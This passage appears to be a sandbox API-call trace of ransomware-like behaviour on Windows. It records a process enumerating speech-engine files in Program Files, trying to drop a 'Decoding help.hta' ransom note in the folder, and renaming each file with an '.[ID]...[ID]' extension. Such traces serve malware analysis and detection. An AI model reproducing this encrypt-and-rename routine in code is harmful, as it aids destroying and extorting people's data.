ftLastWriteTime.dwHighDateTime=0x1ca042b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0059.667] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0059.667] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0059.667] FindNextFileW (in: hFindFile=0x10fbcc98, lpFindFileData=0x904fd30 | out: lpFindFileData=0x904fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd85ef28, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd85ef28, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xd64fa49b, ftLastWriteTime.dwHighDateTime=0x1ca042b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0059.667] FindClose (in: hFindFile=0x10fbcc98 | out: hFindFile=0x10fbcc98) returned 1 Thread: id = 916 os_tid = 0x844 [0059.673] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\en-US\\enu-dsk\\*.*", lpFindFileData=0x92cfd30 | out: lpFindFileData=0x92cfd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd8f7490, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd8f7490, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd8f7490, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x10fbcd18 [0059.679] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0059.679] FindNextFileW (in: hFindFile=0x10fbcd18, lpFindFileData=0x92cfd30 | out: lpFindFileData=0x92cfd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd8f7490, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd8f7490, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd8f7490, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0059.679] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0059.679] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0059.679] FindNextFileW (in: hFindFile=0x10fbcd18, lpFindFileData=0x92cfd30 | out: lpFindFileData=0x92cfd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7bb848fc, ftCreationTime.dwHighDateTime=0x1c9ea13, ftLastAccessTime.dwLowDateTime=0x7bb848fc, ftLastAccessTime.dwHighDateTime=0x1c9ea13, ftLastWriteTime.dwLowDateTime=0x7bb848fc, ftLastWriteTime.dwHighDateTime=0x1c9ea13, nFileSizeHigh=0x0, nFileSizeLow=0x3ec2, dwReserved0=0x0, dwReserved1=0x0, cFileName="M1033DSK.APL", cAlternateFileName="")) returned 1 [0059.679] lstrcpyW (in: lpString1=0x2a8486a0, lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\en-US\\enu-dsk\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\en-US\\enu-dsk\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\en-US\\enu-dsk\\*.*" [0059.679] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\en-US\\enu-dsk\\*.*") returned 87 [0059.679] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\en-US\\enu-dsk\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\en-US\\enu-dsk\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\en-US\\enu-dsk\\Decoding help.hta" [0059.679] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\en-US\\enu-dsk\\Decoding help.hta" (normalized: "c:\\program files (x86)\\common files\\speechengines\\microsoft\\tts20\\en-us\\enu-dsk\\decoding help.hta")) returned 0xffffffff [0059.679] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\en-US\\enu-dsk\\Decoding help.hta" (normalized: "c:\\program files (x86)\\common files\\speechengines\\microsoft\\tts20\\en-us\\enu-dsk\\decoding help.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0059.680] WriteFile (in: hFile=0xffffffff, lpBuffer=0x403006, nNumberOfBytesToWrite=0x78e, lpNumberOfBytesWritten=0x92cfcf8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x92cfcf8, lpOverlapped=0x0) returned 0 [0059.680] CloseHandle (hObject=0xffffffff) returned 0 [0059.680] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\en-US\\enu-dsk\\Decoding help.hta", dwFileAttributes=0x1) returned 0 [0059.680] lstrcmpiW (lpString1="Decoding help.hta", lpString2="M1033DSK.APL") returned -1 [0059.680] lstrlenW (lpString="M1033DSK.APL") returned 12 [0059.680] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\en-US\\enu-dsk\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\en-US\\enu-dsk\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\en-US\\enu-dsk\\*.*" [0059.680] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\en-US\\enu-dsk\\*.*") returned 87 [0059.680] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\en-US\\enu-dsk\\", lpString2="M1033DSK.APL" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\en-US\\enu-dsk\\M1033DSK.APL") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\en-US\\enu-dsk\\M1033DSK.APL" [0059.680] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\en-US\\enu-dsk\\M1033DSK.APL" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\en-US\\enu-dsk\\M1033DSK.APL") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\en-US\\enu-dsk\\M1033DSK.APL" [0059.680] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\en-US\\enu-dsk\\M1033DSK.APL", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\en-US\\enu-dsk\\M1033DSK.APL.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\en-US\\enu-dsk\\M1033DSK.APL.[ID]g9uZrLhJaygpwRm1[ID]" [0059.680] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\en-US\\enu-dsk\\M1033DSK.APL" (normalized: "c:\\program files (x86)\\common files\\speechengines\\microsoft\\tts20\\en-us\\enu-dsk\\m1033dsk.apl"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\en-US\\enu-dsk\\M1033DSK.APL.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\common files\\speechengines\\microsoft\\tts20\\en-us\\enu-dsk\\m1033dsk.apl.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0059.680] FindNextFileW (in: hFindFile=0x10fbcd18, lpFindFileData=0x92cfd30 | out: lpFindFileData=0x92cfd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc7650f9d, ftCreationTime.dwHighDateTime=0x1ca03fd, ftLastAccessTime.dwLowDateTime=0xc7650f9d, ftLastAccessTime.dwHighDateTime=0x1ca03fd, ftLastWriteTime.dwLowDateTime=0x7bc1ce7c, ftLastWriteTime.dwHighDateTime=0x1c9ea13, nFileSizeHigh=0x0, nFileSizeLow=0x764f8, dwReserved0=0x0, dwReserved1=0x0, cFileName="M1033DSK.CRT", cAlternateFileName="")) returned 1 [0059.680] lstrcpyW (in: lpString1=0x2a8486a0, lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\en-US\\enu-dsk\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\en-US\\enu-dsk\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\en-US\\enu-dsk\\*.*" [0059.680] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\en-US\\enu-dsk\\*.*") returned 87 [0059.680] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\en-US\\enu-dsk\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\en-US\\enu-dsk\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\en-US\\enu-dsk\\Decoding help.hta" [0059.680] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\en-US\\enu-dsk\\Decoding help.hta" (normalized: "c:\\program files (x86)\\common files\\speechengines\\microsoft\\tts20\\en-us\\enu-dsk\\decoding help.hta")) returned 0xffffffff [0059.680] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\en-US\\enu-dsk\\Decoding help.hta" (normalized: "c:\\program files (x86)\\common files\\speechengines\\microsoft\\tts20\\en-us\\enu-dsk\\decoding help.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0059.681] WriteFile (in: hFile=0xffffffff, lpBuffer=0x403006, nNumberOfBytesToWrite=0x78e, lpNumberOfBytesWritten=0x92cfcf8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x92cfcf8, lpOverlapped=0x0) returned 0 [0059.681] CloseHandle (hObject=0xffffffff) returned 0 [0059.681] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\en-US\\enu-dsk\\Decoding help.hta", dwFileAttributes=0x1) returned 0 [0059.681] lstrcmpiW (lpString1="Decoding help.hta", lpString2="M1033DSK.CRT") returned -1 [0059.681] lstrlenW (lpString="M1033DSK.CRT") returned 12 [0059.681] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\en-US\\enu-dsk\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\en-US\\enu-dsk\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\en-US\\enu-dsk\\*.*" [0059.681] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\en-US\\enu-dsk\\*.*") returned 87 [0059.681] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\en-US\\enu-dsk\\", lpString2="M1033DSK.CRT" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\en-US\\enu-dsk\\M1033DSK.CRT") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\en-US\\enu-dsk\\M1033DSK.CRT" [0059.681] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\en-US\\enu-dsk\\M1033DSK.CRT" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\en-US\\enu-dsk\\M1033DSK.CRT") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\en-US\\enu-dsk\\M1033DSK.CRT" [0059.681] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\en-US\\enu-dsk\\M1033DSK.CRT", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\en-US\\enu-dsk\\M1033DSK.CRT.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\en-US\\enu-dsk\\M1033DSK.CRT.[ID]g9uZrLhJaygpwRm1[ID]" [0059.681] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\en-US\\enu-dsk\\M1033DSK.CRT" (normalized: "c:\\program files (x86)\\common files\\speechengines\\microsoft\\tts20\\en-us\\enu-dsk\\m1033dsk.crt"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\en-US\\enu-dsk\\M1033DSK.CRT.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\common files\\speechengines\\microsoft\\tts20\\en-us\\enu-dsk\\m1033dsk.crt.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0059.687] FindNextFileW (in: hFindFile=0x10fbcd18, lpFindFileData=0x92cfd30 | out: lpFindFileData=0x92cfd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc77357d7, ftCreationTime.dwHighDateTime=0x1ca03fd, ftLastAccessTime.dwLowDateTime=0xc77357d7, ftLastAccessTime.dwHighDateTime=0x1ca03fd, ftLastWriteTime.dwLowDateTime=0x7c84ff3c, ftLastWriteTime.dwHighDateTime=0x1c9ea13, nFileSizeHigh=0x0, nFileSizeLow=0x1c6aed4, dwReserved0=0x0, dwReserved1=0x0, cFileName="M1033DSK.CSD", cAlternateFileName="")) returned 1 [0059.687] lstrcpyW (in: lpString1=0x2a6c00b8, lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\en-US\\enu-dsk\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\en-US\\enu-dsk\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\en-US\\enu-dsk\\*.*" [0059.687] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\en-US\\enu-dsk\\*.*") returned 87 [0059.687] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\en-US\\enu-dsk\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\en-US\\enu-dsk\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\en-US\\enu-dsk\\Decoding help.hta" [0059.687] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\en-US\\enu-dsk\\Decoding help.hta" (normalized: "c:\\program files (x86)\\common files\\speechengines\\microsoft\\tts20\\en-us\\enu-dsk\\decoding help.hta")) returned 0xffffffff [0059.687] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\en-US\\enu-dsk\\Decoding help.hta" (normalized: "c:\\program files (x86)\\common files\\speechengines\\microsoft\\tts20\\en-us\\enu-dsk\\decoding help.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0059.687] WriteFile (in: hFile=0xffffffff, lpBuffer=0x403006, nNumberOfBytesToWrite=0x78e, lpNumberOfBytesWritten=0x92cfcf8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x92cfcf8, lpOverlapped=0x0) returned 0 [0059.687] CloseHandle (hObject=0xffffffff) returned 0 [0059.687] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\en-US\\enu-dsk\\Decoding help.hta", dwFileAttributes=0x1) returned 0 [0059.688] lstrcmpiW (lpString1="Decoding help.hta", lpString2="M1033DSK.CSD") returned -1 [0059.688] lstrlenW (lpString="M1033DSK.CSD") returned 12 [0059.688] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\en-US\\enu-dsk\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\en-US\\enu-dsk\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\en-US\\enu-dsk\\*.*" [0059.688] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\en-US\\enu-dsk\\*.*") returned 87 [0059.688] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\en-US\\enu-dsk\\", lpString2="M1033DSK.CSD" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\en-US\\enu-dsk\\M1033DSK.CSD") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\en-US\\enu-dsk\\M1033DSK.CSD" [0059.688] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\en-US\\enu-dsk\\M1033DSK.CSD" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\en-US\\enu-dsk\\M1033DSK.CSD") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\en-US\\enu-dsk\\M1033DSK.CSD" [0059.688] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\en-US\\enu-dsk\\M1033DSK.CSD", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\en-US\\enu-dsk\\M1033DSK.CSD.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\en-US\\enu-dsk\\M1033DSK.CSD.[ID]g9uZrLhJaygpwRm1[ID]" [0059.688] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\en-US\\enu-dsk\\M1033DSK.CSD" (normalized: "c:\\program files (x86)\\common files\\speechengines\\microsoft\\tts20\\en-us\\enu-dsk\\m1033dsk.csd"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\en-US\\enu-dsk\\M1033DSK.CSD.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\common files\\speechengines\\microsoft\\tts20\\en-us\\enu-dsk\\m1033dsk.csd.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0059.688] FindNextFileW (in: hFindFile=0x10fbcd18, lpFindFileData=0x92cfd30 | out: lpFindFileData=0x92cfd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc7d9b2cc, ftCreationTime.dwHighDateTime=0x1ca03fd, ftLastAccessTime.dwLowDateTime=0xc7d9b2cc, ftLastAccessTime.dwHighDateTime=0x1ca03fd, ftLastWriteTime.dwLowDateTime=0x7c93477c, ftLastWriteTime.dwHighDateTime=0x1c9ea13, nFileSizeHigh=0x0, nFileSizeLow=0x2059c, dwReserved0=0x0, dwReserved1=0x0, cFileName="M1033DSK.IDX", cAlternateFileName="")) returned 1 [0059.688] lstrcpyW (in: lpString1=0x2a6c00b8, lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\en-US\\enu-dsk\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\en-US\\enu-dsk\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\en-US\\enu-dsk\\*.*" [0059.688] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\en-US\\enu-dsk\\*.*") returned 87 [0059.688] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\en-US\\enu-dsk\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\en-US\\enu-dsk\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\en-US\\enu-dsk\\Decoding help.hta" [0059.688] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\en-US\\enu-dsk\\Decoding help.hta" (normalized: "c:\\program files (x86)\\common files\\speechengines\\microsoft\\tts20\\en-us\\enu-dsk\\decoding help.hta")) returned 0xffffffff [0059.688] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\en-US\\enu-dsk\\Decoding help.hta" (normalized: "c:\\program files (x86)\\common files\\speechengines\\microsoft\\tts20\\en-us\\enu-dsk\\decoding help.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0059.688] WriteFile (in: hFile=0xffffffff, lpBuffer=0x403006, nNumberOfBytesToWrite=0x78e, lpNumberOfBytesWritten=0x92cfcf8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x92cfcf8, lpOverlapped=0x0) returned 0 [0059.688] CloseHandle (hObject=0xffffffff) returned 0 [0059.688] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\en-US\\enu-dsk\\Decoding help.hta", dwFileAttributes=0x1) returned 0 [0059.689] lstrcmpiW (lpString1="Decoding help.hta", lpString2="M1033DSK.IDX") returned -1 [0059.689] lstrlenW (lpString="M1033DSK.IDX") returned 12 [0059.689] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\en-US\\enu-dsk\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\en-US\\enu-dsk\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\en-US\\enu-dsk\\*.*" [0059.689] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\en-US\\enu-dsk\\*.*") returned 87 [0059.689] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\en-US\\enu-dsk\\", lpString2="M1033DSK.IDX" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\en-US\\enu-dsk\\M1033DSK.IDX") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\en-US\\enu-dsk\\M1033DSK.IDX" [0059.689] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\en-US\\enu-dsk\\M1033DSK.IDX" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\en-US\\enu-dsk\\M1033DSK.IDX") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\en-US\\enu-dsk\\M1033DSK.IDX" [0059.689] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\en-US\\enu-dsk\\M1033DSK.IDX", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\en-US\\enu-dsk\\M1033DSK.IDX.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\en-US\\enu-dsk\\M1033DSK.IDX.[ID]g9uZrLhJaygpwRm1[ID]" [0059.689] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\en-US\\enu-dsk\\M1033DSK.IDX" (normalized: "c:\\program files (x86)\\common files\\speechengines\\microsoft\\tts20\\en-us\\enu-dsk\\m1033dsk.idx"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\en-US\\enu-dsk\\M1033DSK.IDX.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\common files\\speechengines\\microsoft\\tts20\\en-us\\enu-dsk\\m1033dsk.idx.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0059.689] FindNextFileW (in: hFindFile=0x10fbcd18, lpFindFileData=0x92cfd30 | out: lpFindFileData=0x92cfd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc7e0d6e9, ftCreationTime.dwHighDateTime=0x1ca03fd, ftLastAccessTime.dwLowDateTime=0xc7e0d6e9, ftLastAccessTime.dwHighDateTime=0x1ca03fd, ftLastWriteTime.dwLowDateTime=0x7da2a43c, ftLastWriteTime.dwHighDateTime=0x1c9ea13, nFileSizeHigh=0x0, nFileSizeLow=0xe3770, dwReserved0=0x0, dwReserved1=0x0, cFileName="M1033DSK.LTS", cAlternateFileName="")) returned 1 [0059.689] lstrcpyW (in: lpString1=0x2a6c00b8, lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\en-US\\enu-dsk\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\en-US\\enu-dsk\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\en-US\\enu-dsk\\*.*" [0059.689] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\en-US\\enu-dsk\\*.*") returned 87 [0059.689] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\en-US\\enu-dsk\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\en-US\\enu-dsk\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Common 